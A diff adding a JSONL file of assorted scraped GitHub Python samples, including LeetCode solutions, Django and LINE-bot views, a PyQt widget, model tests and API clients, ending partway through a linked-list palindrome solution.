diff --git "a/4862.jsonl" "b/4862.jsonl" new file mode 100644--- /dev/null +++ "b/4862.jsonl" @@ -0,0 +1,1890 @@ +{"seq_id":"72065045847","text":"#coding=utf-8\n\n# Given a string, your task is to count how many palindromic substrings in this string.\n#\n# The substrings with different start indexes or end indexes are counted as different substrings even they consist of same characters.\n#\n# Example 1:\n#\n# Input: \"abc\"\n# Output: 3\n# Explanation: Three palindromic strings: \"a\", \"b\", \"c\".\n#\n#\n# Example 2:\n#\n# Input: \"aaa\"\n# Output: 6\n# Explanation: Six palindromic strings: \"a\", \"a\", \"a\", \"aa\", \"aa\", \"aaa\".\n#\n#\n# Note:\n#\n# The input string length won't exceed 1000.\n\n# coding=utf-8\n# 2019-05-29 18:01:30\n\nclass Solution:\n def countSubstrings(self, s):\n res = [] # abbreviation of result\n for i in range(len(s)):\n # odd case\n self.helper(s, i, i, res)\n # even case\n self.helper(s, i, i + 1, res)\n return len(res)\n\n # the auxiliary function to pick out a palindrome\n def helper(self, s, l, r, res):\n while l >= 0 and r < len(s) and s[l] == s[r]:\n # it's very import and tricky to pass the result list in\n # because we have to record every palindrome\n res.append(s[l:r+1])\n l -= 1\n r += 1\n\n\nif __name__ == '__main__':\n s = Solution()\n test1 = 'aaa'\n # test1 = 'abc'\n res = s.countSubstrings(test1)\n print(res)\n","repo_name":"Confuced/happy_leetcode","sub_path":"todos/problem647_day530.py","file_name":"problem647_day530.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16724010346","text":"import pytest\nfrom model import SynthesizabilityModel\n\n@pytest.fixture()\ndef synthesizability_model():\n model = SynthesizabilityModel()\n return model\n\n@pytest.mark.parametrize(\n \"input_series\",\n [\n [\n \"MgV2O4\",\n \"MgV8O4\",\n \"MgV24O4\",\n ],\n [\n \"Li3(WO3)8\",\n \"Li3(W5O3)8\",\n \"Li3(W20O3)8\",\n ]\n ]\n)\n@pytest.mark.xfail(reason=\"Too hard for a random model!\")\ndef test_stoichiometric_monotonicity(input_series:str) -> None:\n predicted_values = [\n synthesizability_model.predict_single(input_val)\n for input_val in input_series\n ]\n\n assert predicted_values == sorted(predicted_values, reverse=True)\n\n@pytest.mark.parametrize(\n \"input_series\",\n [\n [\n \"MgV2O4\",\n \"O4MgV2\",\n \"V2MgO4\",\n ],\n [\n \"Li3(WO3)8\",\n \"(WO3)8Li3\",\n ]\n ]\n)\n@pytest.mark.xfail(reason=\"Too hard for a random model!\")\ndef test_atomic_order(input_series:str) -> None:\n predicted_values = [\n synthesizability_model.predict_single(input_val)\n for input_val in input_series\n ]\n\n assert max(predicted_values) - min(predicted_values) < 0.001","repo_name":"eddotman/mrs-s22-ds04-tutorial","sub_path":"02_testing_models/physicality_tests.py","file_name":"physicality_tests.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74951326808","text":"\ndef binaryGap(N):\n A = [i for i in range(32) if (N >> i) & 1]\n if len(A) < 2:\n return 0\n return max(A[i+1] - A[i] for i in range(len(A) - 1))\n\n\nanswer = binaryGap(1041)\nprint(answer)\n","repo_name":"dineshkumar12004/Leetcode-DSA-Practice","sub_path":"Python/BinaryGap.py","file_name":"BinaryGap.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23447030591","text":"from django.shortcuts 
import render, redirect\nfrom .models import Post\nfrom .forms import PostModelForm, CommentModelForm\nfrom datetime import datetime\n\ndef index(request):\n context = {}\n posts = Post.objects.all()\n context['posts'] = posts\n return render(request, 'post/index.html', context)\n\ndef detail(request, post_id):\n context = {}\n context['posts'] = Post.objects.get(id=post_id)\n return render(request, 'post/detail.html', context)\n\ndef create(request):\n context = {}\n form = PostModelForm(request.POST)\n \n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('post:index')\n else:\n context['form'] = form\n return render(request, 'post/create.html', context)\n else:\n context['form'] = PostModelForm(initial={'date_created': datetime.now()})\n return render(request, 'post/create.html', context)\n\ndef comment(request, post_id):\n context = {}\n form = CommentModelForm(request.POST)\n context['form'] = CommentModelForm(initial={'date_created': datetime.now(), 'post': post_id})\n \n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('post:index')\n else:\n context['form'] = form\n return render(request, 'post/create.html', context)\n else:\n context['form'] = CommentModelForm(initial={'date_created': datetime.now(), 'post': post_id})\n return render(request, 'post/create.html', context)\n\ndef update(request, post_id):\n context = {}\n post = Post.objects.get(id=post_id)\n\n if request.method == 'POST':\n form = PostModelForm(request.POST, instance=post)\n if form.is_valid():\n form.save()\n return HttpResponse('Post updated')\n else:\n context['form'] = form\n render(request, 'post/update.html', context)\n else:\n context['form'] = PostModelForm(instance=post)\n return render(request, 'post/update.html', context)\n","repo_name":"jammaligad/midtermmaligad","sub_path":"post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29907697825","text":"#!/usr/bin/env python3\n#\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QApplication, QGroupBox, QGridLayout, QLabel, \n QHBoxLayout, QVBoxLayout, QSizePolicy, QWidget, QFrame)\nimport psutil\nimport datetime\n\nclass UserView(QWidget):\n def __init__(self, parent=None):\n super(UserView, self).__init__(parent)\n \n# self.setFixedSize(450, 280)\n self.mainLayout = QVBoxLayout() \n self.createUserGroup()\n self.mainLayout.addWidget(self.userGroupBox)\n self.setLayout(self.mainLayout)\n\n def updateShow(self):\n self.userGroupBox.deleteLater()\n self.createUserGroup()\n self.mainLayout.addWidget(self.userGroupBox)\n# self.update()\n\n def createUserGroup(self):\n self.userGroupBox = QGroupBox(\"用户登录信息\")\n self.userLayout = QGridLayout()\n self.userLayout.setRowStretch(100, 100)\n\n info = psutil.users()\n# print(len(psutil.users()))\n num = 1\n self.userLayout.addWidget(self.addLabel(\"登陆名\"), 0, 0)\n self.userLayout.addWidget(self.addLabel(\"登陆终端\"), 0, 1)\n self.userLayout.addWidget(self.addLabel(\"登陆主机\"), 0, 2)\n self.userLayout.addWidget(self.addLabel(\"登陆时间\"), 0, 3)\n for i in info:\n self.insertUser(i, num)\n num += 1\n self.userGroupBox.setLayout(self.userLayout)\n\n def addLabel(self, value):\n label = QLabel(value)\n label.setAlignment(Qt.AlignHCenter)\n return label\n\n def insertUser(self, user, num):\n self.userLayout.addWidget(self.addLine(user.name), num, 0)\n self.userLayout.addWidget(self.addLine(user.terminal), num, 1)\n 
self.userLayout.addWidget(self.addLine(user.host), num, 2)\n self.userLayout.addWidget(self.addLine(datetime.datetime.\\\n fromtimestamp(user.started).strftime(\"%Y-%m-%d %H:%M:%S\")), num, 3)\n\n def addLine(self, value):\n line = QLabel(value)\n line.setAlignment(Qt.AlignCenter)\n line.setSizePolicy(QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Maximum))\n line.setFrameStyle(QFrame.Panel | QFrame.Sunken)\n return line\n\nif __name__ == \"__main__\":\n import sys\n app = QApplication(sys.argv)\n user = UserView()\n user.show()\n sys.exit(app.exec_())\n\n","repo_name":"tianboarenjie/BIND-Management","sub_path":"UserView.py","file_name":"UserView.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22860139842","text":"import json\nimport requests\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\n \nfrom linebot import LineBotApi, WebhookParser\nfrom linebot.exceptions import InvalidSignatureError, LineBotApiError\nfrom linebot.models import MessageEvent, TextSendMessage, StickerMessage\n \nline_bot_api = LineBotApi(settings.LINE_CHANNEL_ACCESS_TOKEN)\nparser = WebhookParser(settings.LINE_CHANNEL_SECRET)\n\n\ndef get_gym_capacity():\n url = 'https://ntusportscenter.ntu.edu.tw/counter.txt'\n r = requests.get(url)\n if r.status_code == requests.codes.ok:\n r = json.loads(r.text)\n capacity = r['CounterData'][0]['innerCount'].split(';')[0]\n print(capacity)\n return f'體育館人數:{capacity}'\n else:\n return 'error occurs when fetch the data'\n\n\n\"\"\"\nNormally when you make a request via a form you want the form being submitted to your view to originate from your website and not come from some other domain. \nTo ensure that this happens, you can put a csrf token in your form for your view to recognize. \nIf you add @csrf_exempt to the top of your view, then you are basically telling the view that it doesn't need the token. 
\nThis is a security exemption that you should take seriously.\n\"\"\"\n@csrf_exempt\ndef callback(request):\n if request.method == 'POST':\n signature = request.META['HTTP_X_LINE_SIGNATURE']\n body = request.body.decode('utf-8')\n \n try:\n events = parser.parse(body, signature)\n except InvalidSignatureError:\n return HttpResponseForbidden()\n except LineBotApiError:\n return HttpResponseBadRequest()\n\n for event in events:\n if isinstance(event, MessageEvent) or isinstance(event, StickerMessage):\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=get_gym_capacity())\n )\n return HttpResponse()\n else:\n return HttpResponse()\n","repo_name":"KaiChen1008/NTU-Gym-Line-Bot-Integration","sub_path":"line-bot-server/bot-server/line-bot-server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41085062087","text":"from typing import Optional\nfrom app.extensions.database import session\nfrom app.extensions.utils.log_helper import logger_\nfrom app.persistence.model.post_report_model import PostReportModel\nfrom core.domains.board.entity.report_entity import PostReportEntity\nfrom core.domains.report.dto.post_report_dto import CreatePostReportDto\n\nlogger = logger_.getLogger(__name__)\n\n\nclass ReportRepository:\n def create_post_report(\n self, dto: CreatePostReportDto\n ) -> Optional[PostReportEntity]:\n try:\n post_report = PostReportModel(\n post_id=dto.post_id,\n report_user_id=dto.report_user_id,\n status=dto.status,\n context=dto.status,\n confirm_admin_id=dto.confirm_admin_id,\n is_system_report=dto.is_system_report,\n )\n session.add(post_report)\n session.commit()\n\n return post_report.to_entity() if post_report else None\n except Exception as e:\n logger.error(\n f\"[ReportRepository][create_post_report] post_id : {dto.post_id} report_user_id : {dto.report_user_id} \"\n f\"error : {e}\"\n )\n session.rollback()\n return None\n\n def get_post_report(\n self, report_user_id: int, post_id\n ) -> Optional[PostReportEntity]:\n post_report = (\n session.query(PostReportModel)\n .filter_by(report_user_id=report_user_id, post_id=post_id)\n .first()\n )\n return post_report.to_entity() if post_report else None\n","repo_name":"copyNdpaste/rabbit","sub_path":"core/domains/report/repository/report_repository.py","file_name":"report_repository.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74665322648","text":"#conding:utf-8\nimport xlrd\nimport jieba\nimport re\n\n#停用词 列表\nstopwordSet = set()\npathstop = 'C://Users//zhangheng//Desktop//张芬数据分析//stopwords.txt'\nwith open(pathstop,'r',encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n stopwordSet.add(line)\n\n\n\npath = 'C://Users//zhangheng//Desktop//张芬数据分析//400//17年7月至2月11日诉求数据.xlsx'\npathR = \"C://Users//zhangheng//Desktop//张芬数据分析//400//sanjifenlei.txt\"\npathBase = \"C://Users//zhangheng//Desktop//张芬数据分析//400//\"\nset = set()\ndata = xlrd.open_workbook(path)\ntable = data.sheets()[0]\nnrows = table.nrows\nprint(nrows)\nncols = table.ncols\nwith open(pathR,'r',encoding='utf-8') as f:\n for line in f.readlines():\n line = str(line.strip())\n array = line.split(\" \")\n if(len(array) == 2):\n leixing = array[0]\n set.add(leixing)\n\nfor leixing in set:\n #print(leixing)\n date_dict = {}\n for i in range(1, nrows):\n brand = 
str(table.row_values(i)[5]).strip().replace(\" \",\"\")\n print(brand)\n\n array = brand.split(\"-\")\n if(len(array) == 3 ):\n x = array[2]\n if(x == leixing):\n print(\"jinlaile \")\n question = str(table.row_values(i)[44]).strip().replace(\" \",\"\")\n print('question: ',question)\n question = re.sub(\"[0-9\\!\\%\\[\\]\\,\\。.]\", \"\", question)\n if len(question) > 1:\n seg_list = list(jieba.cut(question,cut_all = False))\n query = (','.join(seg_list)).replace(',',' ')\n #print(type(query))\n array = query.split(\" \")\n for x in iter(array):\n if(len(x)>1 and x not in stopwordSet):\n\n if x not in date_dict:\n date_dict[x] = 1\n else:\n date_dict[x] += 1\n\n\n\n print('date_dict: ',len(date_dict))\n date = sorted(date_dict.items(),key=lambda item:item[1],reverse=True)\n #以类型名 命名,\n leixingS = str(leixing).replace(\"/\",\"\")\n pathW = pathBase+str(leixingS)+\".txt\"\n print(pathW)\n w = open(pathW,'w',encoding='utf-8')\n\n for i in date:\n newline = str(i[0])+\" \"+str(i[1])\n w.write(newline)\n w.write(\"\\n\")\n w.flush()\n w.close()\n\n\n\n\n\n\n\n\n","repo_name":"LawLietzh/workspacePy","sub_path":"py/gongZuo/zhangfen_400/tf_TongJi.py","file_name":"tf_TongJi.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31525262079","text":"from flask import session, render_template, redirect, url_for, flash, abort, request\n\nfrom leaderboard import app, db\nfrom leaderboard.database import Downvote\nfrom leaderboard.filters import user_has_voted\n\n@app.route('/entry//downvote', methods=['GET'])\ndef downvote(id):\n\tif 'user_id' not in session:\n\t\tabort(401)\n\tif request.method == 'GET':\n\t\tif user_has_voted(session['user_id'], id):\n\t\t\tflash('you have already voted on this entry')\n\t\t\treturn redirect(url_for('leaderboard'))\n\t\telse:\n\t\t\tdownvote = Downvote(session['user_id'], id)\n\t\t\tdb.session.add(downvote)\n\t\t\tdb.session.commit()\n\t\t\tflash('downvoted entry')\n\t\t\treturn redirect(url_for('leaderboard'))","repo_name":"robclewley/flask-leaderboard","sub_path":"leaderboard/endpoints/downvote.py","file_name":"downvote.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31339956052","text":"import random\nimport requests\nfrom dsp.modules.hf import HFModel, openai_to_hf\nfrom dsp.modules.cache_utils import CacheMemory, NotebookCacheMemory, cache_turn_on\n\n# from dsp.modules.adapter import TurboAdapter, DavinciAdapter, LlamaAdapter\n\n\nclass HFClientTGI(HFModel):\n def __init__(self, model, port, url=\"http://future-hgx-1\", **kwargs):\n super().__init__(model=model, is_client=True)\n\n self.url = url\n self.ports = port if isinstance(port, list) else [port]\n\n self.headers = {\"Content-Type\": \"application/json\"}\n\n self.kwargs = {\n \"temperature\": 0.01,\n \"max_tokens\": 75,\n \"top_p\": 0.97,\n \"n\": 1,\n \"stop\": [\"\\n\", \"\\n\\n\"],\n **kwargs,\n }\n\n # print(self.kwargs)\n\n def _generate(self, prompt, **kwargs):\n kwargs = {**self.kwargs, **kwargs}\n\n payload = {\n \"inputs\": prompt,\n \"parameters\": {\n \"do_sample\": kwargs[\"n\"] > 1,\n \"best_of\": kwargs[\"n\"],\n \"details\": kwargs[\"n\"] > 1,\n # \"max_new_tokens\": kwargs.get('max_tokens', kwargs.get('max_new_tokens', 75)),\n # \"stop\": [\"\\n\", \"\\n\\n\"],\n **kwargs,\n }\n }\n\n payload[\"parameters\"] = openai_to_hf(**payload[\"parameters\"])\n\n 
payload[\"parameters\"][\"temperature\"] = max(\n 0.1, payload[\"parameters\"][\"temperature\"]\n )\n\n # print(payload['parameters'])\n\n # response = requests.post(self.url + \"/generate\", json=payload, headers=self.headers)\n\n response = send_hftgi_request_v01(f\"{self.url}:{random.Random().choice(self.ports)}\" + \"/generate\", url=self.url, ports=tuple(self.ports), json=payload, headers=self.headers)\n\n try:\n json_response = response.json()\n # completions = json_response[\"generated_text\"]\n\n completions = [json_response[\"generated_text\"]]\n\n if (\n \"details\" in json_response\n and \"best_of_sequences\" in json_response[\"details\"]\n ):\n completions += [\n x[\"generated_text\"]\n for x in json_response[\"details\"][\"best_of_sequences\"]\n ]\n\n response = {\"prompt\": prompt, \"choices\": [{\"text\": c} for c in completions]}\n return response\n except Exception as e:\n print(\"Failed to parse JSON response:\", response.text)\n raise Exception(\"Received invalid JSON response from server\")\n\n\n@CacheMemory.cache(ignore=['arg'])\ndef send_hftgi_request_v01(arg, url, ports, **kwargs):\n return requests.post(arg, **kwargs)\n\n@CacheMemory.cache\ndef send_hftgi_request_v00(arg, **kwargs):\n return requests.post(arg, **kwargs)\n\n\nclass ChatModuleClient(HFModel):\n def __init__(self, model, model_path):\n super().__init__(model=model, is_client=True)\n\n from mlc_chat import ChatModule\n from mlc_chat import ChatConfig\n\n self.cm = ChatModule(\n model=model, lib_path=model_path, chat_config=ChatConfig(conv_template=\"LM\")\n )\n\n def _generate(self, prompt, **kwargs):\n output = self.cm.generate(\n prompt=prompt,\n )\n try:\n completions = [{\"text\": output}]\n response = {\"prompt\": prompt, \"choices\": completions}\n return response\n except Exception as e:\n print(\"Failed to parse output:\", response.text)\n raise Exception(\"Received invalid output\")\n","repo_name":"ericmelz/dspy","sub_path":"dsp/modules/hf_client.py","file_name":"hf_client.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18094535839","text":"# Description: Main script for ingesting documents into the database.\nimport argparse\nfrom db.utils import VectorDB, ProcessDocument\n\ndef main(doc_id):\n \n vector_db = VectorDB()\n \n if doc_id not in vector_db.get_document_names():\n try:\n print(f\"Document {doc_id} does not exist in the database.\")\n vector_db.add_documents(\n ProcessDocument(f\"protocols/{doc_id}.pdf\").load_and_chunk()\n )\n except Exception as e:\n print(e)\n \nif __name__ == '__main__':\n argparse = argparse.ArgumentParser()\n argparse.add_argument('--doc_id', type=str, help='document id')\n argparse.add_argument('--file_path', type=str, help='document file path')\n \n args = argparse.parse_args()\n doc_id = args.doc_id\n file_path = args.file_path\n\n if doc_id is not None:\n main(doc_id)\n if file_path is not None:\n vector_db = VectorDB()\n raw_chunks = ProcessDocument(file_path).load_and_chunk(strategy=None)\n vector_db.add_documents(ProcessDocument(file_path).load_and_chunk())\n else:\n print(\"Please provide a document id or file path\")\n\n ","repo_name":"anshmaniaa/gpt_poc","sub_path":"ingestion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45358396088","text":"import tensorflow as tf\n\n\ndef safe_norm(s, axis=-1, epsilon=1e-7, 
keepdims=False, name=None):\n \"\"\"\n Computes the norm of some input tensor\n\n :param s: A 4-D tf.Tensor\n :param axis: An integer, axis on which to apply safe_norm\n :param epsilon: A float, used to avoid dividing by zero\n :param keepdims: If true, retains reduced dimensions with length 1.\n :return: A tensor, the norm of tensor s\n \"\"\"\n with tf.name_scope(name, default_name='safe_norm'):\n squared_norm = tf.reduce_sum(tf.square(s), axis=axis, keepdims=keepdims)\n return tf.sqrt(squared_norm + epsilon)\n\n\ndef squash(s_j, axis=-1, epsilon=1e-7, keepdims=True, name=None):\n \"\"\"\n Non-linearity squashing function\n\n The length of the capsule's activity vector represents the probability that the\n object it is detecting exists in the image and so we need to squash this vector\n to be in the range [0,1].\n\n Implementation ref: https://arxiv.org/abs/1710.09829\n\n Note that here we can't use tf.norm since the norm of the vector\n might be zero and so the training process will blow up with\n nans. Thus, we need to implement it manually in order to add an epsilon\n to tackle this problem.\n\n :param s_j: N-D tensor where the axis number of `axis` correspond to the activity vector dimension\n :param axis: An integer, the axis on which squashing is applied\n :param epsilon: A float, small number to avoid dividing by zero\n :param keepdims: A boolean, if True dimensions are not reduced\n :param name: A string, name of scope\n \"\"\"\n with tf.name_scope(name, default_name='squash'):\n # compute the norm of the vector s\n squared_norm = tf.reduce_sum(tf.square(s_j), axis=axis, keepdims=keepdims)\n s_j_norm = tf.sqrt(squared_norm + epsilon)\n s_j_unit_scale = s_j / s_j_norm # unit scaling (second part of the equation)\n add_scale = squared_norm / (1. 
+ squared_norm) # additional scaling (first part of the equation)\n v_j = s_j_unit_scale * add_scale # element-wise product\n return v_j\n","repo_name":"mmz33/CapsNet","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38451648840","text":"import inspect\nfrom dataclasses import dataclass\nimport requests\nfrom abc import ABC, abstractmethod\n\n\nclass InstanceAttrNamesGetterMixin:\n def get_attr_names(self):\n names = [name for name in vars(self)\n if not inspect.ismethod(name)]\n return names\n\nclass DBRow(ABC):\n @abstractmethod\n def get_values_row(self):\n raise NotImplementedError()\n\n\n@dataclass\nclass Weather(DBRow, InstanceAttrNamesGetterMixin):\n name: str\n weather_description: str\n main_temp: str\n main_pressure: str\n main_humidity: str\n wind_speed: str\n\n @staticmethod\n def from_json(json):\n return Weather(\n name=json[\"name\"],\n weather_description=json[\"weather\"][0][\"description\"],\n main_temp=float(json[\"main\"][\"temp\"]),\n main_pressure=int(json[\"main\"][\"pressure\"]),\n main_humidity=int(json[\"main\"][\"humidity\"]),\n wind_speed=float(json[\"wind\"][\"speed\"])\n )\n\n def get_values_row(self):\n return (\n self.name, self.weather_description, self.main_temp, self.main_pressure, self.main_humidity, self.wind_speed)\n\n\nclass OpenWeatherApiClient:\n def __init__(self, api_key: str, base_url=''):\n self.api_key = api_key\n self.base_url = base_url\n\n def get_weather(self, city) -> Weather:\n params = {\"q\": city, \"appid\": self.api_key, 'units': 'metric'}\n json_dict = requests.get(self.base_url, params=params).json()\n return Weather.from_json(json_dict)\n\n\nif __name__ == '__main__':\n api_key = input('>')\n cities = [\"New York\", \"London\", \"Warsaw\"]\n apiClient = OpenWeatherApiClient(api_key)\n for city in cities:\n print(apiClient.get_weather(city).get_attr_names())\n\n","repo_name":"Adam3004/BITPython","sub_path":"6/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29378547843","text":"import sympy as sp\nimport numpy as np\nfrom sympy import *\nimport os\nx = sp.Symbol('X')\ny = sp.Symbol('Y')\nos.system('cls')\n\ndef integral_environment():\n os.system('cls')\n print(\"Enter equation\")\n print(\"\")\n entry = input()\n [*entry]\n equation = [element for element in entry if element.strip()]\n\n def solver(function,var):\n answer = sp.integrate(function,var)\n return answer\n \n def variable_finder(entry):\n for element in entry:\n if element == 'X':\n variable = x\n return variable\n elif element == 'Y':\n variable = y\n return variable\n \n def separator(entry):\n operators = ['+','-','*','/']\n sublists = []\n current_sublist = []\n for element in entry:\n if element in operators:\n sublists.append(current_sublist)\n current_sublist = []\n sublists.append([element])\n else:\n current_sublist.append(element)\n sublists.append(current_sublist)\n return sublists\n \n def list_annihilator(entry):\n stringy = \"\"\n for element in entry:\n stringy += element\n return stringy\n \n def compiler(entry):\n exp = {'^':'**'}\n variables = {'X':'*X'}\n var = variable_finder(entry)\n separated_lists = separator(equation)\n\n result = []\n for i in separated_lists:\n if i[0] == '+' or i[0] == '-':\n continue\n else:\n list_term_1 = [exp['^'] if element == '^' else element 
for element in i]\n term = list_annihilator(list_term_1)\n result.append(solver(term, var))\n \n final_ret = \"\"\n for i in result:\n final_ret = final_ret + str(i)\n for z in separated_lists:\n if z[0] == '+' or z[0] == '-':\n final_ret = final_ret + z[0]\n separated_lists.remove(z)\n break\n else:\n continue\n return final_ret\n init_printing(use_unicode=False, wrap_line=False)\n print('')\n print(compiler(equation))\n print('')\n \nintegral_environment()","repo_name":"Naenaenoi/ACS","sub_path":"integration test.py","file_name":"integration test.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70633130008","text":"def spiralTraverse(matrix):\n array = []\n rowStart = 0\n rowEnd = len(matrix) - 1\n colStart = 0\n colEnd = len(matrix[0]) - 1\n\n while(rowStart <= rowEnd and colStart <= colEnd):\n for col in range(colStart, colEnd + 1):\n array.append(matrix[rowStart][col])\n \n for row in range(rowStart + 1, rowEnd + 1):\n array.append(matrix[row][colEnd])\n \n for col in reversed(range(colStart, colEnd)):\n array.append(matrix[rowEnd][col])\n\n for row in reversed(range(rowStart + 1, rowEnd)):\n array.append(matrix[row][colStart])\n\n rowStart += 1\n rowEnd -= 1\n colStart += 1\n colEnd -= 1\n\n return array\n\nprint(spiralTraverse([\n [1, 2, 3, 4],\n [12, 13, 14, 5],\n [11, 16, 15, 6],\n [10, 9, 8, 7]\n]))\n\nprint(spiralTraverse([[1]]))\n\n\n","repo_name":"Damoy/AlgoTraining","sub_path":"AlgoExpert/src2/python/SpiralTraverse.py","file_name":"SpiralTraverse.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11765770155","text":"#\n# file: fxy_gaussian_ga_tuned.py\n#\n# RTK, 19-Jun-2020\n# Last update: 22-Jun-2020\n#\n################################################################\n\nimport time\nimport os\nimport sys\nsys.path.append(\"../\")\n\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom GA import *\n\nfrom Bounds import *\nfrom RandomInitializer import *\n\nclass Objective:\n def Evaluate(self, p):\n return -5.0*np.exp(-0.5*((p[0]+2.2)**2/0.4+(p[1]-4.3)**2/0.4)) + \\\n -2.0*np.exp(-0.5*((p[0]-2.2)**2/0.4+(p[1]+4.3)**2/0.4))\n\n\ndef Dispersion(swarm, i, d): \n x,y = swarm.pos[:,0], swarm.pos[:,1]\n dx = x.max() - x.min()\n dy = y.max() - y.min()\n d[i] = (dx + dy) / 2.0 \n\ndef wdist(x,y):\n return np.sqrt((2.2-x)**2 + (-4.3-y)**2)\n\ndef rdist(x,y):\n return np.sqrt((-2.2-x)**2 + (4.3-y)**2)\n\n\ndef main():\n npart = 100\n miter = 100\n runs = 100\n\n b = Bounds([-6,-6],[6,6],enforce=\"resample\")\n obj = Objective()\n ri = RandomInitializer(npart=npart, ndim=2, bounds=b)\n\n v = np.zeros((runs,miter))\n for i in range(runs):\n b = Bounds([-6,-6],[6,6],enforce=\"resample\")\n ri = RandomInitializer(npart=npart, ndim=2, bounds=b)\n swarm = GA(obj=obj, npart=npart, ndim=2, max_iter=miter, init=ri, bounds=b, CR=0.3, F=0.4, top=0.2)\n swarm.Initialize()\n for j in range(miter):\n swarm.Step()\n res = swarm.Results()\n v[i,j] = res[\"gbest\"][-1]\n plt.plot(np.arange(miter)[::5],v.mean(axis=0)[::5], marker='o', linestyle='none', color='k')\n plt.plot(v.mean(axis=0), color='k')\n plt.xlabel('Generation')\n plt.ylabel('Swarm Best')\n plt.tight_layout(pad=0, w_pad=0, h_pad=0)\n plt.savefig(\"fxy_gaussian_ga_tuned_plot.png\", dpi=300)\n plt.close()\n print(\"Final minimum value %0.8f\" % (v.mean(axis=0)[-1],))\n print()\n\n\nif (__name__ == \"__main__\"):\n 
main()\n\n","repo_name":"umfundii/SwarmOptimization","sub_path":"basic/fxy_gaussian_ga_tuned.py","file_name":"fxy_gaussian_ga_tuned.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42456015041","text":"\"\"\"\nCrear una lista con el contenido de esta tabla de video juegos:\n\nACCION AVENTURA DEPORTES\nGTA ASSINS FIFA 21\nGOD CRASH PES 12\nPUGB POP MOTO GP 21\n\nMostrar esta info ordenada\n\n\"\"\"\n\ntabla = [\n {\n \"categoria\": \"ACCION\",\n \"juegos\": [\"GTA\", \"GOD\", \"PUGB\"]\n },\n {\n \"categoria\": \"AVENTURA\",\n \"juegos\": [\"ASSINS\", \"CRASH\", \"POP\"]\n },\n {\n \"categoria\": \"DEPORTES\",\n \"juegos\": [\"FIFA 21\", \"PES 12\", \"MOTO GP 21\"]\n }\n]\n\nfor categoria in tabla:\n print(f\"-------{categoria['categoria']}-------\")\n for juego in categoria['juegos']:\n print(juego)","repo_name":"at-hi/master-python","sub_path":"12-ejercicios/ejercicio6.py","file_name":"ejercicio6.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"347876940","text":"import cv2\nimport numpy as np\n\ndef bgr2gray(bgr):\n b, g, r = bgr[:, :, 2], bgr[:, :, 1], bgr[:, :, 0]\n gray = (0.1140 * b) + (0.5870 * g) + (0.2989 * r)\n return gray\n\nimage = cv2.imread('./naeun.jpg')\nimage = bgr2gray(image)\nimage = image.astype(np.uint8)\ncv2.imshow('picture',image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n","repo_name":"Nroot33/Computer_Graphic","sub_path":"week 1/RGB2GRAY.py","file_name":"RGB2GRAY.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38186815741","text":"class Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n temp = []\n curr = head\n while curr is not None:\n temp.append(curr.val)\n curr = curr.next\n return temp[::-1] == temp\n\n\n# Time O(N) Space O(N)\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n 